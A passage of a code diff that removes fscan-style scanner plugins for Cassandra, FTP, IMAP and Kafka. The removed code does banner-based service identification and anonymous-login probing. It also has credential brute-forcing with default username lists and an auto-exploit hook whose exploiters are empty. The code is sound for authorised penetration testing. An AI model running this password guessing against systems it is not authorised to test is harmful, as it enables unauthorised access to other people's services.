-func (p *CassandraPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到Cassandra服务进行识别
-	cassandraInfo, isCassandra := p.identifyCassandraService(ctx, info)
-	if isCassandra {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("cassandra_service_identified", target, cassandraInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "Cassandra",
-			Banner:  cassandraInfo,
-			Extra: map[string]interface{}{
-				"service": "Cassandra",
-				"port":    info.Ports,
-				"info":    cassandraInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为Cassandra，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为Cassandra服务"),
-	}, nil
-}
-
-// identifyCassandraService 通过连接识别Cassandra服务
-func (p *CassandraPlugin) identifyCassandraService(ctx context.Context, info *common.HostInfo) (string, bool) {
-	// 尝试建立简单的TCP连接
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return "", false
-	}
-	defer conn.Close()
-	
-	// 对于Cassandra native protocol (9042)，尝试发送OPTIONS frame
-	if info.Ports == "9042" {
-		return p.identifyNativeProtocol(conn)
-	}
-	
-	// 通用端口检测（其他端口）
-	return p.identifyGenericCassandra(conn)
-}
-
-// identifyNativeProtocol 识别Cassandra native protocol
-func (p *CassandraPlugin) identifyNativeProtocol(conn net.Conn) (string, bool) {
-	// 设置读写超时
-	conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// Cassandra native protocol OPTIONS frame
-	// Frame format: version(1) + flags(1) + stream(2) + opcode(1) + length(4) + body
-	optionsFrame := []byte{
-		0x04,       // Version 4
-		0x00,       // Flags
-		0x00, 0x00, // Stream ID
-		0x05,       // Opcode: OPTIONS
-		0x00, 0x00, 0x00, 0x00, // Body length: 0
-	}
-	
-	// 发送OPTIONS请求
-	_, err := conn.Write(optionsFrame)
-	if err != nil {
-		return "", false
-	}
-	
-	// 读取响应
-	response := make([]byte, 1024)
-	n, err := conn.Read(response)
-	if err != nil || n < 8 {
-		return "", false
-	}
-	
-	// 检查响应是否为有效的Cassandra协议响应
-	if n >= 8 && response[0] == 0x84 { // Response version
-		// 简单解析响应以获取支持的版本信息
-		return "Cassandra Native Protocol v4", true
-	}
-	
-	return "", false
-}
-
-// identifyGenericCassandra 通用Cassandra识别
-func (p *CassandraPlugin) identifyGenericCassandra(conn net.Conn) (string, bool) {
-	// 设置超时
-	conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// 尝试读取任何初始数据
-	response := make([]byte, 512)
-	n, err := conn.Read(response)
-	
-	if err == nil && n > 0 {
-		responseStr := string(response[:n])
-		// 检查响应中是否包含Cassandra相关信息
-		if strings.Contains(strings.ToLower(responseStr), "cassandra") {
-			return fmt.Sprintf("Cassandra服务: %s", strings.TrimSpace(responseStr)), true
-		}
-	}
-	
-	// 如果端口开放但没有明确标识，仍然认为可能是Cassandra
-	return "Cassandra服务", true
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterCassandraPlugin 注册Cassandra插件
-func RegisterCassandraPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "cassandra",
-			Version:     "2.0.0", 
-			Author:      "fscan-team",
-			Description: "Apache Cassandra服务扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{9042}, // Cassandra Native Protocol
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"cassandra", "nosql", "database", "bruteforce"},
-		},
-		func() base.Plugin {
-			return NewCassandraPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("cassandra", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterCassandraPlugin()
-}

Plugins/services/ftp/connector.go

@@ -1,116 +0,0 @@
-package ftp
-
-import (
-	"context"
-	"fmt"
-	"time"
-
-	ftplib "github.com/jlaffaye/ftp"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// FTPConnector FTP连接器实现
-type FTPConnector struct {
-	host string
-	port string
-}
-
-// NewFTPConnector 创建FTP连接器
-func NewFTPConnector() *FTPConnector {
-	return &FTPConnector{}
-}
-
-// Connect 连接到FTP服务
-func (c *FTPConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	c.host = info.Host
-	c.port = info.Ports
-	
-	// 构建连接地址
-	target := fmt.Sprintf("%s:%s", c.host, c.port)
-	
-	// 创建FTP连接配置
-	config := &FTPConfig{
-		Target:  target,
-		Timeout: time.Duration(common.Timeout) * time.Second,
-	}
-	
-	return config, nil
-}
-
-// Authenticate 认证
-func (c *FTPConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	config, ok := conn.(*FTPConfig)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 在goroutine中建立FTP连接，支持Context取消
-	resultChan := make(chan struct {
-		ftpConn *ftplib.ServerConn
-		err     error
-	}, 1)
-	
-	go func() {
-		ftpConn, err := ftplib.DialTimeout(config.Target, config.Timeout)
-		select {
-		case <-ctx.Done():
-			if ftpConn != nil {
-				ftpConn.Quit()
-			}
-		case resultChan <- struct {
-			ftpConn *ftplib.ServerConn
-			err     error
-		}{ftpConn, err}:
-		}
-	}()
-	
-	// 等待连接结果或Context取消
-	var ftpConn *ftplib.ServerConn
-	var err error
-	select {
-	case result := <-resultChan:
-		ftpConn, err = result.ftpConn, result.err
-		if err != nil {
-			return fmt.Errorf("FTP连接失败: %v", err)
-		}
-	case <-ctx.Done():
-		return fmt.Errorf("FTP连接超时: %v", ctx.Err())
-	}
-	
-	defer ftpConn.Quit()
-	
-	// 在goroutine中进行登录认证
-	loginChan := make(chan error, 1)
-	
-	go func() {
-		err := ftpConn.Login(cred.Username, cred.Password)
-		select {
-		case <-ctx.Done():
-		case loginChan <- err:
-		}
-	}()
-	
-	// 等待登录结果或Context取消
-	select {
-	case err := <-loginChan:
-		if err != nil {
-			return fmt.Errorf("FTP认证失败: %v", err)
-		}
-		return nil
-	case <-ctx.Done():
-		return fmt.Errorf("FTP认证超时: %v", ctx.Err())
-	}
-}
-
-// Close 关闭连接
-func (c *FTPConnector) Close(conn interface{}) error {
-	// FTP配置无需显式关闭
-	return nil
-}
-
-// FTPConfig FTP连接配置
-type FTPConfig struct {
-	Target  string
-	Timeout time.Duration
-}

Plugins/services/ftp/exploiter.go

@@ -1,36 +0,0 @@
-package ftp
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// FTPExploiter FTP利用器实现 - 最小化版本，不提供利用功能
-type FTPExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewFTPExploiter 创建FTP利用器
-func NewFTPExploiter() *FTPExploiter {
-	exploiter := &FTPExploiter{
-		BaseExploiter: base.NewBaseExploiter("ftp"),
-	}
-	
-	// FTP插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *FTPExploiter) setupExploitMethods() {
-	// FTP插件不提供利用功能，仅进行弱密码扫描
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *FTPExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// FTP插件不提供利用功能
-	return nil, nil
-}

Plugins/services/ftp/plugin.go

@@ -1,266 +0,0 @@
-package ftp
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// FTPPlugin FTP插件实现
-type FTPPlugin struct {
-	*base.ServicePlugin
-	exploiter *FTPExploiter
-}
-
-// NewFTPPlugin 创建FTP插件
-func NewFTPPlugin() *FTPPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "ftp",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "FTP文件传输协议扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{21, 2121}, // 21: 标准FTP端口, 2121: 常见替代端口
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"ftp", "file_transfer", "bruteforce", "anonymous"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewFTPConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建FTP插件
-	plugin := &FTPPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewFTPExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapUnauthorized,
-		base.CapDataExtraction,
-		base.CapFileUpload,
-		base.CapFileWrite,
-	})
-	
-	return plugin
-}
-
-// Scan 重写扫描方法以支持匿名登录检测和自动利用
-func (p *FTPPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	// 如果禁用暴力破解，只进行服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	// 首先尝试匿名登录
-	anonymousCred := &base.Credential{
-		Username: "anonymous",
-		Password: "",
-	}
-	
-	result, err := p.ScanCredential(ctx, info, anonymousCred)
-	if err == nil && result.Success {
-		target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-		common.LogSuccess(i18n.GetText("ftp_anonymous_success", target))
-		
-		// 自动利用匿名访问
-		if !common.DisableExploit {
-			p.autoExploit(context.Background(), info, anonymousCred)
-		}
-		
-		return result, nil
-	}
-	
-	// 执行基础的密码扫描
-	result, err = p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	// 记录成功的弱密码发现
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	cred := result.Credentials[0]
-	common.LogSuccess(i18n.GetText("ftp_weak_pwd_success", target, cred.Username, cred.Password))
-	
-	// 自动利用功能（可通过-ne参数禁用）
-	if result.Success && len(result.Credentials) > 0 && !common.DisableExploit {
-		p.autoExploit(context.Background(), info, result.Credentials[0])
-	}
-	
-	return result, nil
-}
-
-// generateCredentials 生成FTP凭据
-func (p *FTPPlugin) generateCredentials() []*base.Credential {
-	// 获取FTP专用的用户名字典
-	usernames := common.Userdict["ftp"]
-	if len(usernames) == 0 {
-		// 默认FTP用户名
-		usernames = []string{"ftp", "ftpuser", "admin", "test", "user", "guest"}
-	}
-	
-	return base.GenerateCredentials(usernames, common.Passwords)
-}
-
-// autoExploit 自动利用功能
-func (p *FTPPlugin) autoExploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("plugin_exploit_start", "FTP", target))
-	
-	// 执行利用操作
-	result, err := p.exploiter.Exploit(ctx, info, creds)
-	if err != nil {
-		common.LogError(i18n.GetText("plugin_exploit_failed", "FTP", err))
-		return
-	}
-	
-	// 处理利用结果
-	if result != nil && result.Success {
-		// SaveExploitResult会自动使用LogSuccess显示红色利用成功消息
-		base.SaveExploitResult(info, result, "FTP")
-	}
-}
-
-// Exploit 使用exploiter执行利用
-func (p *FTPPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *FTPPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *FTPPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// performServiceIdentification 执行FTP服务识别（-nobr模式）
-func (p *FTPPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到FTP服务获取Banner
-	ftpInfo, isFTP := p.identifyFTPService(ctx, info)
-	if isFTP {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("ftp_service_identified", target, ftpInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "FTP",
-			Banner:  ftpInfo,
-			Extra: map[string]interface{}{
-				"service": "FTP",
-				"port":    info.Ports,
-				"info":    ftpInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为FTP，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为FTP服务"),
-	}, nil
-}
-
-// identifyFTPService 通过Banner识别FTP服务
-func (p *FTPPlugin) identifyFTPService(ctx context.Context, info *common.HostInfo) (string, bool) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试建立TCP连接
-	conn, err := net.DialTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return "", false
-	}
-	defer conn.Close()
-	
-	// 设置读取超时
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// FTP服务器在连接后会发送Welcome Banner
-	banner := make([]byte, 1024)
-	n, err := conn.Read(banner)
-	if err != nil || n < 3 {
-		return "", false
-	}
-	
-	bannerStr := strings.TrimSpace(string(banner[:n]))
-	
-	// 检查FTP协议标识
-	if strings.HasPrefix(bannerStr, "220") {
-		// FTP服务器通常以220开头发送welcome消息
-		
-		// 提取FTP服务器信息
-		lines := strings.Split(bannerStr, "\n")
-		if len(lines) > 0 {
-			firstLine := strings.TrimSpace(lines[0])
-			// 移除状态码
-			if len(firstLine) > 4 && firstLine[:3] == "220" {
-				serverInfo := strings.TrimSpace(firstLine[3:])
-				// 移除可能的连字符
-				if len(serverInfo) > 0 && serverInfo[0] == '-' {
-					serverInfo = strings.TrimSpace(serverInfo[1:])
-				}
-				
-				if serverInfo != "" {
-					return fmt.Sprintf("FTP服务: %s", serverInfo), true
-				}
-			}
-		}
-		
-		return "FTP服务", true
-	}
-	
-	// 检查其他可能的FTP响应
-	lowerBanner := strings.ToLower(bannerStr)
-	if strings.Contains(lowerBanner, "ftp") || 
-	   strings.Contains(lowerBanner, "file transfer") ||
-	   strings.Contains(lowerBanner, "vsftpd") ||
-	   strings.Contains(lowerBanner, "proftpd") ||
-	   strings.Contains(lowerBanner, "pure-ftpd") {
-		return fmt.Sprintf("FTP服务: %s", bannerStr), true
-	}
-	
-	return "", false
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterFTPPlugin 注册FTP插件
-func RegisterFTPPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "ftp",
-			Version:     "2.0.0",
-			Author:      "fscan-team",
-			Description: "FTP文件传输协议扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{21, 2121}, // 21: 标准FTP端口, 2121: 常见替代端口
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"ftp", "file_transfer", "bruteforce", "anonymous"},
-		},
-		func() base.Plugin {
-			return NewFTPPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("ftp", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterFTPPlugin()
-}

Plugins/services/imap/connector.go

@@ -1,133 +0,0 @@
-package imap
-
-import (
-	"bufio"
-	"context"
-	"crypto/tls"
-	"fmt"
-	"io"
-	"net"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// IMAPConnection IMAP连接包装器
-type IMAPConnection struct {
-	conn   net.Conn
-	reader *bufio.Reader
-	target string
-}
-
-// IMAPConnector IMAP连接器实现
-type IMAPConnector struct {
-	host string
-	port string
-}
-
-// NewIMAPConnector 创建IMAP连接器
-func NewIMAPConnector() *IMAPConnector {
-	return &IMAPConnector{}
-}
-
-// Connect 连接到IMAP服务
-func (c *IMAPConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	c.host = info.Host
-	c.port = info.Ports
-	
-	target := fmt.Sprintf("%s:%s", c.host, c.port)
-	
-	// 根据端口选择连接类型
-	var conn net.Conn
-	var err error
-	
-	if c.port == "993" {
-		// IMAPS端口，使用TLS连接
-		tlsConfig := &tls.Config{
-			InsecureSkipVerify: true,
-		}
-		conn, err = common.WrapperTlsWithContext(ctx, "tcp", target, tlsConfig)
-	} else {
-		// IMAP端口，使用普通连接
-		conn, err = common.WrapperTcpWithContext(ctx, "tcp", target)
-	}
-	
-	if err != nil {
-		return nil, fmt.Errorf("IMAP连接失败: %v", err)
-	}
-	
-	reader := bufio.NewReader(conn)
-	
-	// 设置IMAP特殊超时：默认超时时间 + 5秒
-	imapTimeout := time.Duration(common.Timeout+5) * time.Second
-	conn.SetReadDeadline(time.Now().Add(imapTimeout))
-	
-	// 读取IMAP欢迎消息
-	if _, readErr := reader.ReadString('\n'); readErr != nil {
-		conn.Close()
-		return nil, fmt.Errorf("IMAP欢迎消息读取失败: %v", readErr)
-	}
-	
-	return &IMAPConnection{
-		conn:   conn,
-		reader: reader,
-		target: target,
-	}, nil
-}
-
-// Authenticate 认证
-func (c *IMAPConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	imapConn, ok := conn.(*IMAPConnection)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 设置IMAP特殊超时：默认超时时间 + 5秒
-	imapTimeout := time.Duration(common.Timeout+5) * time.Second
-	imapConn.conn.SetDeadline(time.Now().Add(imapTimeout))
-	
-	// 发送LOGIN命令
-	loginCmd := fmt.Sprintf("a001 LOGIN \"%s\" \"%s\"\r\n", cred.Username, cred.Password)
-	_, err := imapConn.conn.Write([]byte(loginCmd))
-	if err != nil {
-		return fmt.Errorf("发送登录命令失败: %v", err)
-	}
-	
-	// 读取认证响应
-	for {
-		select {
-		case <-ctx.Done():
-			return fmt.Errorf("IMAP认证超时: %v", ctx.Err())
-		default:
-			// 设置读取超时，避免无限等待（使用IMAP特殊超时）
-			imapTimeout := time.Duration(common.Timeout+5) * time.Second
-			imapConn.conn.SetReadDeadline(time.Now().Add(imapTimeout))
-			
-			response, err := imapConn.reader.ReadString('\n')
-			if err != nil {
-				if err == io.EOF {
-					return fmt.Errorf("IMAP认证失败")
-				}
-				return fmt.Errorf("读取响应失败: %v", err)
-			}
-			
-			if strings.Contains(response, "a001 OK") {
-				return nil // 认证成功
-			}
-			
-			if strings.Contains(response, "a001 NO") || strings.Contains(response, "a001 BAD") {
-				return fmt.Errorf("IMAP认证失败")
-			}
-		}
-	}
-}
-
-// Close 关闭连接
-func (c *IMAPConnector) Close(conn interface{}) error {
-	if imapConn, ok := conn.(*IMAPConnection); ok && imapConn.conn != nil {
-		return imapConn.conn.Close()
-	}
-	return nil
-}

Plugins/services/imap/exploiter.go

@@ -1,36 +0,0 @@
-package imap
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// IMAPExploiter IMAP利用器实现 - 最小化版本，不提供利用功能
-type IMAPExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewIMAPExploiter 创建IMAP利用器
-func NewIMAPExploiter() *IMAPExploiter {
-	exploiter := &IMAPExploiter{
-		BaseExploiter: base.NewBaseExploiter("imap"),
-	}
-	
-	// IMAP插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *IMAPExploiter) setupExploitMethods() {
-	// IMAP插件不提供利用功能，仅进行弱密码扫描
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *IMAPExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// IMAP插件不提供利用功能
-	return nil, nil
-}

Plugins/services/imap/plugin.go

@@ -1,224 +0,0 @@
-package imap
-
-import (
-	"context"
-	"crypto/tls"
-	"fmt"
-	"net"
-	"regexp"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// IMAPPlugin IMAP插件实现
-type IMAPPlugin struct {
-	*base.ServicePlugin
-	exploiter *IMAPExploiter
-}
-
-// NewIMAPPlugin 创建IMAP插件
-func NewIMAPPlugin() *IMAPPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "imap",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "IMAP邮件服务扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{143, 993}, // IMAP和IMAPS端口
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"imap", "mail", "bruteforce"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewIMAPConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建IMAP插件
-	plugin := &IMAPPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewIMAPExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapDataExtraction,
-	})
-	
-	
-	return plugin
-}
-
-// Scan 重写扫描方法以支持服务识别
-func (p *IMAPPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	// 如果禁用了暴力破解，只进行服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	// 执行基础的密码扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	// 记录成功的弱密码发现
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	cred := result.Credentials[0]
-	common.LogSuccess(i18n.GetText("imap_weak_pwd_success", target, cred.Username, cred.Password))
-	
-	return result, nil
-}
-
-// generateCredentials 重写凭据生成方法
-func (p *IMAPPlugin) generateCredentials() []*base.Credential {
-	// 获取IMAP专用的用户名字典
-	usernames := common.Userdict["imap"]
-	if len(usernames) == 0 {
-		// 默认IMAP用户名
-		usernames = []string{"admin", "root", "test", "mail", "postmaster", "administrator"}
-	}
-	
-	return base.GenerateCredentials(usernames, common.Passwords)
-}
-
-// Exploit 使用exploiter执行利用
-func (p *IMAPPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *IMAPPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *IMAPPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// performServiceIdentification 执行IMAP服务识别（-nobr模式）
-func (p *IMAPPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 根据端口选择连接类型
-	var conn net.Conn
-	var err error
-	
-	if info.Ports == "993" {
-		// IMAPS端口，使用TLS连接
-		tlsConfig := &tls.Config{
-			InsecureSkipVerify: true,
-		}
-		conn, err = common.WrapperTlsWithContext(ctx, "tcp", target, tlsConfig)
-	} else {
-		// IMAP端口，使用普通连接
-		conn, err = common.WrapperTcpWithContext(ctx, "tcp", target)
-	}
-	
-	if err != nil {
-		return &base.ScanResult{
-			Success: false,
-			Error:   err,
-		}, nil
-	}
-	defer conn.Close()
-	
-	// 读取IMAP Banner
-	imapInfo, isIMAP := p.identifyIMAPService(conn)
-	if isIMAP {
-		// 记录服务识别成功
-		service := "IMAP"
-		if info.Ports == "993" {
-			service = "IMAPS"
-		}
-		common.LogSuccess(i18n.GetText("imap_service_identified", target, imapInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: service,
-			Banner:  imapInfo,
-			Extra: map[string]interface{}{
-				"service": service,
-				"port":    info.Ports,
-				"info":    imapInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为IMAP，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为IMAP服务"),
-	}, nil
-}
-
-// identifyIMAPService 通过Banner识别IMAP服务
-func (p *IMAPPlugin) identifyIMAPService(conn net.Conn) (string, bool) {
-	// 设置读取超时
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// IMAP服务器在连接后会发送欢迎消息
-	banner := make([]byte, 512)
-	n, err := conn.Read(banner)
-	if err != nil || n < 4 {
-		return "", false
-	}
-	
-	bannerStr := strings.TrimSpace(string(banner[:n]))
-	
-	// 检查IMAP协议标识
-	if strings.Contains(bannerStr, "* OK") && (strings.Contains(strings.ToLower(bannerStr), "imap") || 
-		strings.Contains(strings.ToLower(bannerStr), "dovecot") || 
-		strings.Contains(strings.ToLower(bannerStr), "courier") ||
-		strings.Contains(strings.ToLower(bannerStr), "cyrus")) {
-		
-		// 提取服务器信息
-		if matched := regexp.MustCompile(`\* OK (.+?) ready`).FindStringSubmatch(bannerStr); len(matched) >= 2 {
-			return fmt.Sprintf("IMAP服务: %s", matched[1]), true
-		}
-		
-		if matched := regexp.MustCompile(`\* OK (.+?)$`).FindStringSubmatch(bannerStr); len(matched) >= 2 {
-			return fmt.Sprintf("IMAP服务: %s", matched[1]), true
-		}
-		
-		return fmt.Sprintf("IMAP服务: %s", bannerStr), true
-	}
-	
-	return "", false
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterIMAPPlugin 注册IMAP插件
-func RegisterIMAPPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "imap",
-			Version:     "2.0.0",
-			Author:      "fscan-team",
-			Description: "IMAP邮件服务扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{143, 993}, // IMAP和IMAPS端口
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"imap", "mail", "bruteforce"},
-		},
-		func() base.Plugin {
-			return NewIMAPPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("imap", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterIMAPPlugin()
-}

Plugins/services/kafka/connector.go

@@ -1,114 +0,0 @@
-package kafka
-
-import (
-	"context"
-	"fmt"
-	"strings"
-	"time"
-
-	"github.com/IBM/sarama"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// KafkaConnection Kafka连接包装器
-type KafkaConnection struct {
-	client sarama.Client
-	target string
-}
-
-// KafkaConnector Kafka连接器实现
-type KafkaConnector struct {
-	host string
-	port string
-}
-
-// NewKafkaConnector 创建Kafka连接器
-func NewKafkaConnector() *KafkaConnector {
-	return &KafkaConnector{}
-}
-
-// Connect 连接到Kafka服务
-func (c *KafkaConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	c.host = info.Host
-	c.port = info.Ports
-	
-	target := fmt.Sprintf("%s:%s", c.host, c.port)
-	
-	// 返回连接信息，实际连接在Authenticate时建立
-	return &KafkaConnection{
-		client: nil, // 延迟连接
-		target: target,
-	}, nil
-}
-
-// Authenticate 认证
-func (c *KafkaConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	kafkaConn, ok := conn.(*KafkaConnection)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 关闭之前的连接（如果有）
-	if kafkaConn.client != nil {
-		kafkaConn.client.Close()
-	}
-	
-	// 创建新的认证配置
-	timeout := time.Duration(common.Timeout) * time.Second
-	config := sarama.NewConfig()
-	config.Net.DialTimeout = timeout
-	config.Net.ReadTimeout = timeout
-	config.Net.WriteTimeout = timeout
-	config.Net.TLS.Enable = false
-	config.Version = sarama.V2_0_0_0
-
-	// 如果提供了用户名密码，设置SASL认证
-	if cred.Username != "" || cred.Password != "" {
-		config.Net.SASL.Enable = true
-		config.Net.SASL.Mechanism = sarama.SASLTypePlaintext
-		config.Net.SASL.User = cred.Username
-		config.Net.SASL.Password = cred.Password
-		config.Net.SASL.Handshake = true
-	}
-
-	brokers := []string{kafkaConn.target}
-
-	// 尝试作为消费者连接测试
-	consumer, err := sarama.NewConsumer(brokers, config)
-	if err == nil {
-		consumer.Close()
-		
-		// 创建认证后的客户端
-		client, clientErr := sarama.NewClient(brokers, config)
-		if clientErr != nil {
-			return fmt.Errorf("创建认证客户端失败: %v", clientErr)
-		}
-		kafkaConn.client = client
-		return nil
-	}
-
-	// 如果消费者连接失败，尝试作为客户端连接
-	client, clientErr := sarama.NewClient(brokers, config)
-	if clientErr == nil {
-		kafkaConn.client = client
-		return nil
-	}
-
-	// 检查认证相关错误
-	if strings.Contains(err.Error(), "SASL") ||
-		strings.Contains(err.Error(), "authentication") ||
-		strings.Contains(err.Error(), "credentials") {
-		return fmt.Errorf("Kafka认证失败")
-	}
-
-	return fmt.Errorf("Kafka连接失败: %v", err)
-}
-
-// Close 关闭连接
-func (c *KafkaConnector) Close(conn interface{}) error {
-	if kafkaConn, ok := conn.(*KafkaConnection); ok && kafkaConn.client != nil {
-		return kafkaConn.client.Close()
-	}
-	return nil
-}

Plugins/services/kafka/exploiter.go

@@ -1,36 +0,0 @@
-package kafka
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// KafkaExploiter Kafka利用器实现 - 最小化版本，不提供利用功能
-type KafkaExploiter struct {
-	*base.BaseExploiter
-}
-
